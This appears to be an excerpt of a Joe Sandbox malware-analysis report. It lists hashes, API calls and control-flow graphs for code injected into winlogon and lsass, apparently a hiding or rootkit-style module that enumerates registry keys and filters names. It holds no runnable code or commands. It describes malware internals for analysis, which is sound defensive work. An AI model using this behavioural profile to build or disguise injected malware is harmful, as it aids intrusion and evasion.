                        • API ID: ExceptionFileHeaderRaise
                        • String ID: csm
                        • API String ID: 2573137834-1018135373
                        • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                        • Instruction ID: 207757b0be7941945bbc5168ef3fd331411ff0e9450000233a5a2120af0f3481
                        • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                        • Instruction Fuzzy Hash: 01114F32215B8182EB618F16F44435A77E5F788B98F594229EF8C47759EF3CC591CB00
                        Function 000002E991727356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726515083.000002E991720000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991720000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991720000_winlogon.jbxd
                        Similarity
                        • API ID: __std_exception_copy
                        • String ID: ierarchy Descriptor'$riptor at (
                        • API String ID: 592178966-758928094
                        • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                        • Instruction ID: a257186f3850c7b0ed0a211b5e55a5bcdb9ea12776083c4015b6f529102d0367
                        • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                        • Instruction Fuzzy Hash: 16E08661681B8990DF018F62E84429833A0EB59B64B499123995C06312FA38D2FAC720
                        Function 000002E9917273B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726515083.000002E991720000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991720000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991720000_winlogon.jbxd
                        Similarity
                        • API ID: __std_exception_copy
                        • String ID: Locator'$riptor at (
                        • API String ID: 592178966-4215709766
                        • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                        • Instruction ID: 666d30d5e13efd7c2989cd14f499e6fcad5fce96985e36ef4ac7ff9aefadf28a
                        • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                        • Instruction Fuzzy Hash: CFE0CD61641B89C0DF018F62E44019873A0F759B54F8AD123CD4C07312FB38D2E6C720
                        Function 000002E991751BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: Heap$Process$AllocFree
                        • String ID:
                        • API String ID: 756756679-0
                        • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                        • Instruction ID: d4a5e8aca712c33a79de3256f17f9e0da43bbae3851e7c4569dd7d8c7212e1c3
                        • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                        • Instruction Fuzzy Hash: FD119125641B8581EA44DB67E40C22973A1FB89FC1F5A402EDE4E93767DF39C482C750
                        Function 000002E991751268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: Heap$AllocProcess
                        • String ID:
                        • API String ID: 1617791916-0
                        • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                        • Instruction ID: 1436bcb16dbf9b340cef29a2e619caaeb5be8261704b43b7e2ccef2ff9d21f13
                        • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                        • Instruction Fuzzy Hash: 9EE06D35641645C7EB088F63D80C34A36E1FB89F86F86C028C90987352DF7D84D9CBA1

                        Executed Functions

                        Function 00007FF613711140 Relevance: .0, Instructions: 4COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000044.00000002.1534012457.00007FF613711000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF613710000, based on PE: true
                        • Associated: 00000044.00000002.1533823196.00007FF613710000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000044.00000002.1534039625.00007FF61371C000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000044.00000002.1534108187.00007FF61371F000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000044.00000002.1534145791.00007FF613720000.00000008.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000044.00000002.1534766111.00007FF613C49000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000044.00000002.1534802192.00007FF613C4C000.00000002.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_68_2_7ff613710000_eejhedztifcv.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 808f824871d7e1a8eee0a1093264b3d0fd75ff3502bae8c0f48d855cf6986489
                        • Instruction ID: d34b4cde1b4a9956d39892b6155d3bb7864cdac6d01999df734abe88a0c4c300
                        • Opcode Fuzzy Hash: 808f824871d7e1a8eee0a1093264b3d0fd75ff3502bae8c0f48d855cf6986489
                        • Instruction Fuzzy Hash: 78B01232D04B0E84E7006F41EC5335833706B08F50F400030C40D67352CEBD50448B14

                        Execution Graph

                        Execution Coverage:0.9%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:0%
                        Total number of Nodes:132
                        Total number of Limit Nodes:10
                        execution_graph 15377 213bdcb273c 15378 213bdcb276a 15377->15378 15379 213bdcb2858 LoadLibraryA 15378->15379 15380 213bdcb28d4 15378->15380 15379->15378 15381 213bdce1abc 15387 213bdce1628 GetProcessHeap 15381->15387 15383 213bdce1ad2 Sleep SleepEx 15385 213bdce1acb 15383->15385 15385->15383 15386 213bdce1598 StrCmpIW StrCmpW 15385->15386 15432 213bdce18b4 15385->15432 15386->15385 15388 213bdce1648 __free_lconv_mon 15387->15388 15449 213bdce1268 GetProcessHeap 15388->15449 15390 213bdce1650 15391 213bdce1268 2 API calls 15390->15391 15392 213bdce1661 15391->15392 15393 213bdce1268 2 API calls 15392->15393 15394 213bdce166a 15393->15394 15395 213bdce1268 2 API calls 15394->15395 15396 213bdce1673 15395->15396 15397 213bdce168e RegOpenKeyExW 15396->15397 15398 213bdce16c0 RegOpenKeyExW 15397->15398 15399 213bdce18a6 15397->15399 15400 213bdce16ff RegOpenKeyExW 15398->15400 15401 213bdce16e9 15398->15401 15399->15385 15403 213bdce173a RegOpenKeyExW 15400->15403 15404 213bdce1723 15400->15404 15453 213bdce12bc RegQueryInfoKeyW 15401->15453 15407 213bdce175e 15403->15407 15408 213bdce1775 RegOpenKeyExW 15403->15408 15464 213bdce104c RegQueryInfoKeyW 15404->15464 15405 213bdce16f5 RegCloseKey 15405->15400 15412 213bdce12bc 11 API calls 15407->15412 15409 213bdce17b0 RegOpenKeyExW 15408->15409 15410 213bdce1799 15408->15410 15414 213bdce17eb RegOpenKeyExW 15409->15414 15415 213bdce17d4 15409->15415 15413 213bdce12bc 11 API calls 15410->15413 15416 213bdce176b RegCloseKey 15412->15416 15417 213bdce17a6 RegCloseKey 15413->15417 15419 213bdce180f 15414->15419 15420 213bdce1826 RegOpenKeyExW 15414->15420 15418 213bdce12bc 11 API calls 15415->15418 15416->15408 15417->15409 15421 213bdce17e1 RegCloseKey 15418->15421 15422 213bdce104c 4 API calls 15419->15422 15423 213bdce1861 RegOpenKeyExW 15420->15423 15424 213bdce184a 15420->15424 15421->15414 15427 213bdce181c RegCloseKey 15422->15427 15425 213bdce189c RegCloseKey 15423->15425 15426 213bdce1885 15423->15426 15428 213bdce104c 4 API calls 15424->15428 15425->15399 15429 213bdce104c 4 API calls 15426->15429 15427->15420 15430 213bdce1857 RegCloseKey 15428->15430 15431 213bdce1892 RegCloseKey 15429->15431 15430->15423 15431->15425 15477 213bdce14a4 15432->15477 15470 213bdcf6168 15449->15470 15452 213bdce12ae __free_lconv_mon 15452->15390 15454 213bdce148a __free_lconv_mon 15453->15454 15455 213bdce1327 GetProcessHeap 15453->15455 15454->15405 15461 213bdce133e __free_lconv_mon 15455->15461 15456 213bdce1352 RegEnumValueW 15456->15461 15457 213bdce1476 GetProcessHeap 15457->15454 15459 213bdce141e lstrlenW GetProcessHeap 15459->15461 15460 213bdce13d3 GetProcessHeap 15460->15461 15461->15456 15461->15457 15461->15459 15461->15460 15462 213bdce13f3 GetProcessHeap 15461->15462 15463 213bdce1443 StrCpyW 15461->15463 15472 213bdce152c 15461->15472 15462->15461 15463->15461 15465 213bdce11b5 RegCloseKey 15464->15465 15467 213bdce10bf __free_lconv_mon 15464->15467 15465->15403 15466 213bdce10cf RegEnumValueW 15466->15467 15467->15465 15467->15466 15468 213bdce114e GetProcessHeap 15467->15468 15469 213bdce116e GetProcessHeap 15467->15469 15468->15467 15469->15467 15471 213bdce1283 GetProcessHeap 15470->15471 15471->15452 15473 213bdce157c 15472->15473 15476 213bdce1546 15472->15476 15473->15461 15474 213bdce155d StrCmpIW 15474->15476 15475 213bdce1565 StrCmpW 15475->15476 15476->15473 15476->15474 15476->15475 15478 213bdce14e1 GetProcessHeap 15477->15478 15479 213bdce14c1 GetProcessHeap 15477->15479 15483 213bdcf6180 15478->15483 15480 213bdce14da __free_lconv_mon 15479->15480 15480->15478 15480->15479 15484 213bdce14f6 GetProcessHeap HeapFree 15483->15484 15485 213bdce253c 15486 213bdce25bb 15485->15486 15487 213bdce261d GetFileType 15486->15487 15499 213bdce27aa 15486->15499 15488 213bdce2641 15487->15488 15489 213bdce262b StrCpyW 15487->15489 15501 213bdce1a40 GetFinalPathNameByHandleW 15488->15501 15490 213bdce2650 15489->15490 15492 213bdce265a 15490->15492 15493 213bdce26ff 15490->15493 15492->15499 15506 213bdce3844 15492->15506 15509 213bdce3044 StrCmpIW 15492->15509 15513 213bdce1cac 15492->15513 15495 213bdce3844 StrCmpNIW 15493->15495 15498 213bdce3044 4 API calls 15493->15498 15493->15499 15500 213bdce1cac 2 API calls 15493->15500 15495->15493 15498->15493 15500->15493 15502 213bdce1aa9 15501->15502 15503 213bdce1a6a StrCmpNIW 15501->15503 15502->15490 15503->15502 15504 213bdce1a84 lstrlenW 15503->15504 15504->15502 15505 213bdce1a96 StrCpyW 15504->15505 15505->15502 15507 213bdce3851 StrCmpNIW 15506->15507 15508 213bdce3866 15506->15508 15507->15508 15508->15492 15510 213bdce308d PathCombineW 15509->15510 15511 213bdce3076 StrCpyW StrCatW 15509->15511 15512 213bdce3096 15510->15512 15511->15512 15512->15492 15514 213bdce1ccc 15513->15514 15515 213bdce1cc3 15513->15515 15514->15492 15516 213bdce152c 2 API calls 15515->15516 15516->15514 15517 213bdce202c 15518 213bdce205d 15517->15518 15519 213bdce2173 15518->15519 15525 213bdce2081 15518->15525 15526 213bdce213e 15518->15526 15520 213bdce2178 15519->15520 15522 213bdce21e7 15519->15522 15535 213bdce2f04 GetProcessHeap 15520->15535 15524 213bdce2f04 7 API calls 15522->15524 15522->15526 15523 213bdce20b9 StrCmpNIW 15523->15525 15524->15526 15525->15523 15525->15526 15528 213bdce1bf4 15525->15528 15526->15526 15529 213bdce1c1b GetProcessHeap 15528->15529 15533 213bdce1c8b __free_lconv_mon 15528->15533 15530 213bdce1c41 __free_lconv_mon 15529->15530 15531 213bdce1c77 GetProcessHeap 15530->15531 15532 213bdce152c 2 API calls 15530->15532 15530->15533 15531->15533 15534 213bdce1c6e 15532->15534 15533->15525 15534->15531 15536 213bdce2f40 __free_lconv_mon 15535->15536 15537 213bdce3015 GetProcessHeap 15536->15537 15539 213bdce3010 15536->15539 15540 213bdce2fa2 StrCmpNIW 15536->15540 15541 213bdce1bf4 4 API calls 15536->15541 15538 213bdce3029 __free_lconv_mon 15537->15538 15538->15526 15539->15537 15540->15536 15541->15536

                        Executed Functions

                        Function 00000213BDCE253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 5 213bdce253c-213bdce25c0 call 213bdd02cc0 8 213bdce27d8-213bdce27fb 5->8 9 213bdce25c6-213bdce25c9 5->9 9->8 10 213bdce25cf-213bdce25dd 9->10 10->8 11 213bdce25e3-213bdce2629 call 213bdce8c60 * 3 GetFileType 10->11 18 213bdce2641-213bdce264b call 213bdce1a40 11->18 19 213bdce262b-213bdce263f StrCpyW 11->19 20 213bdce2650-213bdce2654 18->20 19->20 22 213bdce26ff-213bdce2704 20->22 23 213bdce265a-213bdce2673 call 213bdce30a8 call 213bdce3844 20->23 24 213bdce2707-213bdce270c 22->24 36 213bdce26aa-213bdce26f4 call 213bdd02cc0 23->36 37 213bdce2675-213bdce26a4 call 213bdce30a8 call 213bdce3044 call 213bdce1cac 23->37 26 213bdce270e-213bdce2711 24->26 27 213bdce2729 24->27 26->27 29 213bdce2713-213bdce2716 26->29 31 213bdce272c-213bdce2745 call 213bdce30a8 call 213bdce3844 27->31 29->27 32 213bdce2718-213bdce271b 29->32 46 213bdce2787-213bdce2789 31->46 47 213bdce2747-213bdce2776 call 213bdce30a8 call 213bdce3044 call 213bdce1cac 31->47 32->27 35 213bdce271d-213bdce2720 32->35 35->27 40 213bdce2722-213bdce2727 35->40 36->8 48 213bdce26fa 36->48 37->8 37->36 40->27 40->31 51 213bdce278b-213bdce27a5 46->51 52 213bdce27aa-213bdce27ad 46->52 47->46 69 213bdce2778-213bdce2783 47->69 48->23 51->24 55 213bdce27af-213bdce27b5 52->55 56 213bdce27b7-213bdce27ba 52->56 55->8 59 213bdce27bc-213bdce27bf 56->59 60 213bdce27d5 56->60 59->60 62 213bdce27c1-213bdce27c4 59->62 60->8 62->60 64 213bdce27c6-213bdce27c9 62->64 64->60 66 213bdce27cb-213bdce27ce 64->66 66->60 68 213bdce27d0-213bdce27d3 66->68 68->8 68->60 69->8 70 213bdce2785 69->70 70->24
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: FileType
                        • String ID: \\.\pipe\
                        • API String ID: 3081899298-91387939
                        • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                        • Instruction ID: 402ccc82d5c6591d2abd376835e1d3f6cc6d53c76c666844c3b5344b78894b12
                        • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                        • Instruction Fuzzy Hash: 1371C6B620879987EF24DF25D8483EAA796F3A978CF540036DD0943B89FE36D7458700
                        Function 00000213BDCE202C Relevance: 4.7, APIs: 1, Strings: 2, Instructions: 162COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 71 213bdce202c-213bdce2057 call 213bdd02d00 73 213bdce205d-213bdce2066 71->73 74 213bdce206f-213bdce2072 73->74 75 213bdce2068-213bdce206c 73->75 76 213bdce2078-213bdce207b 74->76 77 213bdce2223-213bdce2243 74->77 75->74 78 213bdce2081-213bdce2093 76->78 79 213bdce2173-213bdce2176 76->79 78->77 82 213bdce2099-213bdce20a5 78->82 80 213bdce21e7-213bdce21ea 79->80 81 213bdce2178-213bdce2192 call 213bdce2f04 79->81 80->77 86 213bdce21ec-213bdce21ff call 213bdce2f04 80->86 81->77 91 213bdce2198-213bdce21ae 81->91 84 213bdce20a7-213bdce20b7 82->84 85 213bdce20d3-213bdce20de call 213bdce1bbc 82->85 84->85 88 213bdce20b9-213bdce20d1 StrCmpNIW 84->88 92 213bdce20ff-213bdce2111 85->92 99 213bdce20e0-213bdce20f8 call 213bdce1bf4 85->99 86->77 98 213bdce2201-213bdce2209 86->98 88->85 88->92 91->77 97 213bdce21b0-213bdce21cc 91->97 95 213bdce2121-213bdce2123 92->95 96 213bdce2113-213bdce2115 92->96 102 213bdce212a 95->102 103 213bdce2125-213bdce2128 95->103 100 213bdce211c-213bdce211f 96->100 101 213bdce2117-213bdce211a 96->101 104 213bdce21d0-213bdce21e3 97->104 98->77 105 213bdce220b-213bdce2213 98->105 99->92 111 213bdce20fa-213bdce20fd 99->111 107 213bdce212d-213bdce2130 100->107 101->107 102->107 103->107 104->104 108 213bdce21e5 104->108 109 213bdce2216-213bdce2221 105->109 112 213bdce2132-213bdce2138 107->112 113 213bdce213e-213bdce2141 107->113 108->77 109->77 109->109 111->107 112->82 112->113 113->77 114 213bdce2147-213bdce214b 113->114 115 213bdce2162-213bdce216e 114->115 116 213bdce214d-213bdce2150 114->116 115->77 116->77 117 213bdce2156-213bdce215b 116->117 117->114 118 213bdce215d 117->118 118->77
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: Heap$Process$AllocFree
                        • String ID: S$dialer
                        • API String ID: 756756679-3873981283
                        • Opcode ID: 10a6181ad89868b013f95f8d430f86fb0b73c76b57149a1256a42c526e771eaa
                        • Instruction ID: 01a705c1139b4e3a3236aaa51ba8ea78d077b3526d5db40ec5641de093292221
                        • Opcode Fuzzy Hash: 10a6181ad89868b013f95f8d430f86fb0b73c76b57149a1256a42c526e771eaa
                        • Instruction Fuzzy Hash: C951B2B2B1862887EF61CF25D8487EDA3E6F72879CF459021DE0552B85EB36EB51C300
                        Function 00000213BDCE1A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: FinalHandleNamePathlstrlen
                        • String ID: \\?\
                        • API String ID: 2719912262-4282027825
                        • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                        • Instruction ID: 9a3ceae17c6c449fcd09eca06c2232397e8d057c9f4e4c09271c551668b01824
                        • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                        • Instruction Fuzzy Hash: 4AF0317230864592EF70CB21E8887D96762F768B9CF945020DA494A558EB3DC74DCB00
                        Function 00000213BDCE328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                        • String ID:
                        • API String ID: 1683269324-0
                        • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                        • Instruction ID: 5d40ba2aa3b61c65a6b29e875bc405932eba3ae14eb689a115a8dbd4c5664118
                        • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                        • Instruction Fuzzy Hash: 3411E1B161CA0883FF20D720F80DBE92297ABB430EF5001389946451A6FF3BF3488254
                        Function 00000213BDCE1ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                          • Part of subcall function 00000213BDCE1628: GetProcessHeap.KERNEL32 ref: 00000213BDCE1633
                          • Part of subcall function 00000213BDCE1628: HeapAlloc.KERNEL32 ref: 00000213BDCE1642
                          • Part of subcall function 00000213BDCE1628: RegOpenKeyExW.ADVAPI32 ref: 00000213BDCE16B2
                          • Part of subcall function 00000213BDCE1628: RegOpenKeyExW.ADVAPI32 ref: 00000213BDCE16DF
                          • Part of subcall function 00000213BDCE1628: RegCloseKey.ADVAPI32 ref: 00000213BDCE16F9
                          • Part of subcall function 00000213BDCE1628: RegOpenKeyExW.ADVAPI32 ref: 00000213BDCE1719
                          • Part of subcall function 00000213BDCE1628: RegCloseKey.ADVAPI32 ref: 00000213BDCE1734
                          • Part of subcall function 00000213BDCE1628: RegOpenKeyExW.ADVAPI32 ref: 00000213BDCE1754
                          • Part of subcall function 00000213BDCE1628: RegCloseKey.ADVAPI32 ref: 00000213BDCE176F
                          • Part of subcall function 00000213BDCE1628: RegOpenKeyExW.ADVAPI32 ref: 00000213BDCE178F
                          • Part of subcall function 00000213BDCE1628: RegCloseKey.ADVAPI32 ref: 00000213BDCE17AA
                          • Part of subcall function 00000213BDCE1628: RegOpenKeyExW.ADVAPI32 ref: 00000213BDCE17CA
                        • Sleep.KERNEL32 ref: 00000213BDCE1AD7
                        • SleepEx.KERNELBASE ref: 00000213BDCE1ADD
                          • Part of subcall function 00000213BDCE1628: RegCloseKey.ADVAPI32 ref: 00000213BDCE17E5
                          • Part of subcall function 00000213BDCE1628: RegOpenKeyExW.ADVAPI32 ref: 00000213BDCE1805
                          • Part of subcall function 00000213BDCE1628: RegCloseKey.ADVAPI32 ref: 00000213BDCE1820
                          • Part of subcall function 00000213BDCE1628: RegOpenKeyExW.ADVAPI32 ref: 00000213BDCE1840
                          • Part of subcall function 00000213BDCE1628: RegCloseKey.ADVAPI32 ref: 00000213BDCE185B
                          • Part of subcall function 00000213BDCE1628: RegOpenKeyExW.ADVAPI32 ref: 00000213BDCE187B
                          • Part of subcall function 00000213BDCE1628: RegCloseKey.ADVAPI32 ref: 00000213BDCE1896
                          • Part of subcall function 00000213BDCE1628: RegCloseKey.ADVAPI32 ref: 00000213BDCE18A0
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: CloseOpen$HeapSleep$AllocProcess
                        • String ID:
                        • API String ID: 1534210851-0
                        • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                        • Instruction ID: 5c1e5f493c3240c0c1d6ba6cc6eea2f3c80886ee07ec0849ec39ecbda1c65d01
                        • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                        • Instruction Fuzzy Hash: 2D31F0F120964943FF50DB26DA593E913A6ABA4BCCF0474319E098B695FE36E771C310
                        Function 00000213BDCB273C Relevance: 1.7, APIs: 1, Instructions: 187libraryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 176 213bdcb273c-213bdcb27a4 call 213bdcb29d4 * 4 185 213bdcb29b2 176->185 186 213bdcb27aa-213bdcb27ad 176->186 188 213bdcb29b4-213bdcb29d0 185->188 186->185 187 213bdcb27b3-213bdcb27b6 186->187 187->185 189 213bdcb27bc-213bdcb27bf 187->189 189->185 190 213bdcb27c5-213bdcb27e6 189->190 190->185 192 213bdcb27ec-213bdcb280c 190->192 193 213bdcb280e-213bdcb2836 192->193 194 213bdcb2838-213bdcb283f 192->194 193->193 193->194 195 213bdcb28df-213bdcb28e6 194->195 196 213bdcb2845-213bdcb2852 194->196 197 213bdcb28ec-213bdcb2901 195->197 198 213bdcb2992-213bdcb29b0 195->198 196->195 199 213bdcb2858-213bdcb286a LoadLibraryA 196->199 197->198 200 213bdcb2907 197->200 198->188 201 213bdcb286c-213bdcb2878 199->201 202 213bdcb28ca-213bdcb28d2 199->202 205 213bdcb290d-213bdcb2921 200->205 206 213bdcb28c5-213bdcb28c8 201->206 202->199 203 213bdcb28d4-213bdcb28d9 202->203 203->195 208 213bdcb2982-213bdcb298c 205->208 209 213bdcb2923-213bdcb2934 205->209 206->202 207 213bdcb287a-213bdcb287d 206->207 210 213bdcb287f-213bdcb28a5 207->210 211 213bdcb28a7-213bdcb28b7 207->211 208->198 208->205 213 213bdcb293f-213bdcb2943 209->213 214 213bdcb2936-213bdcb293d 209->214 215 213bdcb28ba-213bdcb28c1 210->215 211->215 217 213bdcb294d-213bdcb2951 213->217 218 213bdcb2945-213bdcb294b 213->218 216 213bdcb2970-213bdcb2980 214->216 215->206 216->208 216->209 219 213bdcb2963-213bdcb2967 217->219 220 213bdcb2953-213bdcb2961 217->220 218->216 219->216 222 213bdcb2969-213bdcb296c 219->222 220->216 222->216
                        APIs
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728820418.00000213BDCB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCB0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdcb0000_lsass.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                        • Instruction ID: 62858d15b17bcbc33b2ca6a6066d80486455f950e6546258cbebb37c44571cfa
                        • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                        • Instruction Fuzzy Hash: AF61E132B4969887EF54CF1590087ADB3A3F764BACF588125DE5D07788EA3ADA53C700

                        Non-executed Functions

                        Function 00000213BDCE2B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 484 213bdce2b2c-213bdce2ba5 call 213bdd02ce0 487 213bdce2ee0-213bdce2f03 484->487 488 213bdce2bab-213bdce2bb1 484->488 488->487 489 213bdce2bb7-213bdce2bba 488->489 489->487 490 213bdce2bc0-213bdce2bc3 489->490 490->487 491 213bdce2bc9-213bdce2bd9 GetModuleHandleA 490->491 492 213bdce2bed 491->492 493 213bdce2bdb-213bdce2beb GetProcAddress 491->493 494 213bdce2bf0-213bdce2c0e 492->494 493->494 494->487 496 213bdce2c14-213bdce2c33 StrCmpNIW 494->496 496->487 497 213bdce2c39-213bdce2c3d 496->497 497->487 498 213bdce2c43-213bdce2c4d 497->498 498->487 499 213bdce2c53-213bdce2c5a 498->499 499->487 500 213bdce2c60-213bdce2c73 499->500 501 213bdce2c75-213bdce2c81 500->501 502 213bdce2c83 500->502 503 213bdce2c86-213bdce2c8a 501->503 502->503 504 213bdce2c8c-213bdce2c98 503->504 505 213bdce2c9a 503->505 506 213bdce2c9d-213bdce2ca7 504->506 505->506 507 213bdce2d9d-213bdce2da1 506->507 508 213bdce2cad-213bdce2cb0 506->508 509 213bdce2ed2-213bdce2eda 507->509 510 213bdce2da7-213bdce2daa 507->510 511 213bdce2cc2-213bdce2ccc 508->511 512 213bdce2cb2-213bdce2cbf call 213bdce199c 508->512 509->487 509->500 513 213bdce2dbb-213bdce2dc5 510->513 514 213bdce2dac-213bdce2db8 call 213bdce199c 510->514 516 213bdce2d00-213bdce2d0a 511->516 517 213bdce2cce-213bdce2cdb 511->517 512->511 519 213bdce2dc7-213bdce2dd4 513->519 520 213bdce2df5-213bdce2df8 513->520 514->513 523 213bdce2d0c-213bdce2d19 516->523 524 213bdce2d3a-213bdce2d3d 516->524 517->516 522 213bdce2cdd-213bdce2cea 517->522 519->520 529 213bdce2dd6-213bdce2de3 519->529 530 213bdce2dfa-213bdce2e03 call 213bdce1bbc 520->530 531 213bdce2e05-213bdce2e12 lstrlenW 520->531 532 213bdce2ced-213bdce2cf3 522->532 523->524 525 213bdce2d1b-213bdce2d28 523->525 527 213bdce2d3f-213bdce2d49 call 213bdce1bbc 524->527 528 213bdce2d4b-213bdce2d58 lstrlenW 524->528 533 213bdce2d2b-213bdce2d31 525->533 527->528 540 213bdce2d93-213bdce2d98 527->540 535 213bdce2d7b-213bdce2d8d call 213bdce3844 528->535 536 213bdce2d5a-213bdce2d64 528->536 537 213bdce2de6-213bdce2dec 529->537 530->531 550 213bdce2e4a-213bdce2e55 530->550 541 213bdce2e35-213bdce2e3f call 213bdce3844 531->541 542 213bdce2e14-213bdce2e1e 531->542 539 213bdce2cf9-213bdce2cfe 532->539 532->540 533->540 545 213bdce2d33-213bdce2d38 533->545 535->540 543 213bdce2e42-213bdce2e44 535->543 536->535 548 213bdce2d66-213bdce2d79 call 213bdce152c 536->548 549 213bdce2dee-213bdce2df3 537->549 537->550 539->516 539->532 540->543 541->543 542->541 544 213bdce2e20-213bdce2e33 call 213bdce152c 542->544 543->509 543->550 544->541 544->550 545->524 545->533 548->535 548->540 